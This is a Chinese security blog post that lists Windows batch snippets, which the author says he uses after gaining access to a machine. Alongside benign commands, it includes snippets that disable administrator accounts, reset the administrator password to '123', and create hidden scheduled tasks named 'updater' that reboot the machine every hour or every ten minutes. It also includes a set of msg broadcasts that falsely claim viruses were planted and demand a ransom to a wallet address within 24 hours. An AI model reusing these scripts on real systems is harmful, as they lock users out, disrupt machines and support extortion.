🍬 博主介绍

👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~
✨主攻领域：【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限，欢迎各位大佬指点，相互学习进步！
Vulhub是一个面向大众的开源漏洞靶场，无需docker知识，简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单，让安全研究者更加专注于漏洞原理本身。

文章目录

• 🍬 博主介绍
• 一、系统程序操作
• • 1、打开记事本
  • 2、关闭记事本
  • 3、打开注册表
  • 4、弹出计算器
  • 5、关闭计算器
  • 6、锁屏
• 二、服务相关操作
• • 1、开启mysql服务
  • 2、关闭mysql服务
• 三、账号相关操作
• • 1、禁用账号
  • 2、启用账号
  • 3、禁用管理员账号
• 四、计划任务相关操作
• • 1、新建计划任务每隔1小时重启一次电脑
  • 2、新建计划任务每隔10分钟重启一次电脑
• 五、浏览器相关操作
• • 1、打开火狐浏览器
  • 2、关闭火狐浏览器
  • 3、卸载火狐浏览器
  • 4、打开谷歌浏览器
  • 5、打开谷歌浏览器&&访问站点
• 六、文件夹相关操作
• • 1、创建文件夹
  • 2、批量创建文件夹
  • 3、打开文件夹
  • 4、删除文件夹
• 七、文件夹相关操作
• • 1、创建文件
  • 2、批量创建文件
  • 3、打开文件
  • 4、删除文件
  • 5、执行dir命令追加到同目录下123.txt
• 八、msg发送消息

常用bat文件，我一般用于拿到权限后的演示，当然也可以玩，有部分危险操作，请规范使用

一、系统程序操作

1、打开记事本

@echo off
start notepad.exe
exit

2、关闭记事本

@echo off
taskkill /f /im notepad.exe
exit

3、打开注册表

@echo off
regedit
exit

4、弹出计算器

@echo off
start calc.exe

5、关闭计算器

@echo off
taskkill /f /im CalculatorApp.exe
exit

6、锁屏

rundll32.exe user32.dll LockWorkStation

二、服务相关操作

1、开启mysql服务

@echo off
net start mysql
echo mysql 服务已启动

2、关闭mysql服务

@echo off
net stop "MySQL"
echo MySQL 服务已关闭！

三、账号相关操作

1、禁用账号

@echo off
net user 用户名 /active:no
exit

2、启用账号

@echo off
net user 用户名 /active:yes
exit

3、禁用管理员账号

@echo off
net user Administrator /active:no
net user admin /active:no
exit
## 4、修改管理员账号密码为123
```bash
@echo off
net user administrator “123”
net user admin “123”
exit

四、计划任务相关操作

1、新建计划任务每隔1小时重启一次电脑

schtasks /create /tn updater /tr "powershell.exe -nop -w hidden -c shutdown -r" /sc hourly /mo 1

2、新建计划任务每隔10分钟重启一次电脑

schtasks /create /tn updater /tr "powershell.exe -nop -w hidden -c shutdown -r" /sc minute /mo 10

五、浏览器相关操作

1、打开火狐浏览器

@echo off
"C:\Program Files\Mozilla Firefox\firefox.exe"
pause

2、关闭火狐浏览器

@echo off
taskkill /f /im firefox.exe
pause

3、卸载火狐浏览器

@echo off
echo 开始卸载火狐浏览器...
"%PROGRAMFILES(X86)%\Mozilla Firefox\uninstall\helper.exe" /S
echo 卸载完成！

4、打开谷歌浏览器

@echo off
start chrome http://10.10.12.12
pause

5、打开谷歌浏览器&&访问站点

@echo off
start chrome http://10.10.12.12
www.google.com
pause

六、文件夹相关操作

1、创建文件夹

@echo off
md  C:\hack1
echo 文件创建完毕

2、批量创建文件夹

@echo off
echo 正在创建hack0.txt~hack100.txt共一百个文本文件......
for /l %%i in (0, 1, 99) do (
md hack%%i
)
echo 文件创建完毕

3、打开文件夹

@echo off
start C:\hack1
echo 文件打开完毕

4、删除文件夹

@echo off
rd /s/q C:\hack%%i
echo 文件删除完毕

七、文件夹相关操作

1、创建文件

@echo off
md  C:\hack1.txt
echo 文件创建完毕

2、批量创建文件

@echo off
echo 正在创建hack0.txt~hack100.txt共一百个文本文件......
for /l %%i in (0, 1, 99) do (
echo 我是hack%%i.txt文件 >> hack%%i.txt
)
echo 文件创建完毕

3、打开文件

@echo off
start C:\hack1.txt
echo 文件打开完毕

4、删除文件

@echo off
rd /s/q C:\hack1.txt
echo 文件删除完毕

5、执行dir命令追加到同目录下123.txt

@echo off
dir c:\windows\ >> 123.txt
exit

八、msg发送消息

语法：msg /server:对端IP地址 * “hello”
举例如下：

@echo off
msg /server:localhost * "hello"
msg /server:localhost * "I me hack"
msg /server:localhost * "I uploaded a system virus such as CIH on your computer"
msg /server:localhost * "I uploaded a small postman etc. worm on your computer"
msg /server:localhost * "I uploaded Hack.Nether.Client and other Trojans on your computer"
msg /server:localhost * "I uploaded a script virus like VBS.Happytime on your computer"
msg /server:localhost * "I uploaded macro viruses like Macro.Melissa on your computer"
msg /server:localhost * "I uploaded a backdoor virus like Backdoor.IRCBot on your computer"
msg /server:localhost * "I uploaded a virus planter virus such as Dropper.BingHe2.2C on your computer"
msg /server:localhost * "I uploaded a destructive program virus such as Harm.formatC.f on your computer"
msg /server:localhost * "I uploaded joke viruses like Joke.Girlghost on your computer"
msg /server:localhost * "I uploaded bundles and viruses like Binder.killsys on your computer"
msg /server:localhost * "If you don't want these viruses to execute on your computer"
msg /server:localhost * "Please remit 10000 Russell to your 1HrA3RRipdtCeSfzLGY611wcrH3SDjyrHj account"
msg /server:localhost * "Don't think about deleting them, you're too late"
msg /server:localhost * "You still have 24 hours"
exit